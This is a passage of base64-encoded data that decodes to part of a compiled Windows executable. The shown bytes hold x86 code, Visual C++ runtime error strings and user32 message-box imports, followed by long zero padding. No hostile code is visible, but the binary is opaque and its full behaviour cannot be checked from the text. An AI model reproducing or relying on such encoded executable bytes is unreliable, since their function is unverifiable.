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 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP////9aFEAAbxRAAHJ1bnRpbWUgZXJy b3IgAAANCgAAVExPU1MgZXJyb3INCgAAAFNJTkcgZXJyb3INCgAAAABET01BSU4gZXJyb3INCgAA UjYwMjgNCi0gdW5hYmxlIHRvIGluaXRpYWxpemUgaGVhcA0KAAAAAFI2MDI3DQotIG5vdCBlbm91 Z2ggc3BhY2UgZm9yIGxvd2lvIGluaXRpYWxpemF0aW9uDQoAAAAAUjYwMjYNCi0gbm90IGVub3Vn aCBzcGFjZSBmb3Igc3RkaW8gaW5pdGlhbGl6YXRpb24NCgAAAABSNjAyNQ0KLSBwdXJlIHZpcnR1 YWwgZnVuY3Rpb24gY2FsbA0KAAAAUjYwMjQNCi0gbm90IGVub3VnaCBzcGFjZSBmb3IgX29uZXhp dC9hdGV4aXQgdGFibGUNCgAAAABSNjAxOQ0KLSB1bmFibGUgdG8gb3BlbiBjb25zb2xlIGRldmlj ZQ0KAAAAAFI2MDE4DQotIHVuZXhwZWN0ZWQgaGVhcCBlcnJvcg0KAAAAAFI2MDE3DQotIHVuZXhw ZWN0ZWQgbXVsdGl0aHJlYWQgbG9jayBlcnJvcg0KAAAAAFI2MDE2DQotIG5vdCBlbm91Z2ggc3Bh Y2UgZm9yIHRocmVhZCBkYXRhDQoADQphYm5vcm1hbCBwcm9ncmFtIHRlcm1pbmF0aW9uDQoAAAAA UjYwMDkNCi0gbm90IGVub3VnaCBzcGFjZSBmb3IgZW52aXJvbm1lbnQNCgBSNjAwOA0KLSBub3Qg ZW5vdWdoIHNwYWNlIGZvciBhcmd1bWVudHMNCgAAAFI2MDAyDQotIGZsb2F0aW5nIHBvaW50IG5v dCBsb2FkZWQNCgAAAABNaWNyb3NvZnQgVmlzdWFsIEMrKyBSdW50aW1lIExpYnJhcnkAAAAACgoA AFJ1bnRpbWUgRXJyb3IhCgpQcm9ncmFtOiAAAAAuLi4APHByb2dyYW0gbmFtZSB1bmtub3duPgAA AAAAAAAAAABHZXRMYXN0QWN0aXZlUG9wdXAAAEdldEFjdGl2ZVdpbmRvdwBNZXNzYWdlQm94QQB1 c2VyMzIuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAC0vAAAgG0AAAgAAAAAAAAA6UEAAOlBAAAAAIAAgACAAIAAgACAAIAAgACAAKAAoACgA KAAoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEgAEAAQABAAEAAQABAAEAAQ ABAAEAAQABAAEAAQABAAhACEAIQAhACEAIQAhACEAIQAhAAQABAAEAAQABAAEAAQAIEAgQCBAIEA gQCBAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAQABAAEAAQABAAEACC AIIAggCCAIIAggACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAEAAQABAA EAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAuAAAAAQAAAAAAAAAAAAAAAQIE CAAAAACkAwAAYIJ5giEAAAAAAAAApt8AAAAAAAChpQAAAAAAAIGf4PwAAAAAQH6A/AAAAACoAwAA waPaoyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIH+AAAAAAAAQP4AAAAAAAC1AwAAwaPaoyAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAIH+AAAAAAAAQf4AAAAAAAC2AwAAz6LkohoA5aLoolsAAAAAAAAA AAAAAAAAAAAAAIH+AAAAAAAAQH6h/gAAAABRBQAAUdpe2iAAX9pq2jIAAAAAAAAAAAAAAAAAAAAA AIHT2N7g+QAAMX6B/gAAAAAFAADACwAAAAAAAAAdAADABAAAAAAAAACWAADABAAAAAAAAACNAADA CAAAAAAAAACOAADACAAAAAAAAACPAADACAAAAAAAAACQAADACAAAAAAAAACRAADACAAAAAAAAACS AADACAAAAAAAAACTAADACAAAAAAAAAADAAAABwAAAAoAAACMAAAA/////wAKAAAAEAAAIAWTGQAA AAAAAAAAAAAAAAAAAAACAAAAcEJAAAgAAABEQkAACQAAABhCQAAKAAAA9EFAABAAAADIQUAAEQAA AJhBQAASAAAAdEFAABMAAABIQUAAGAAAABBBQAAZAAAA6EBAABoAAACwQEAAGwAAAHhAQAAcAAAA UEBAAHgAAABAQEAAeQAAADBAQAB6AAAAIEBAAPwAAAAcQEAA/wAAAAxAQACAVEAAgFRAAJhUQACY VEAA///////////wAAAA8QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 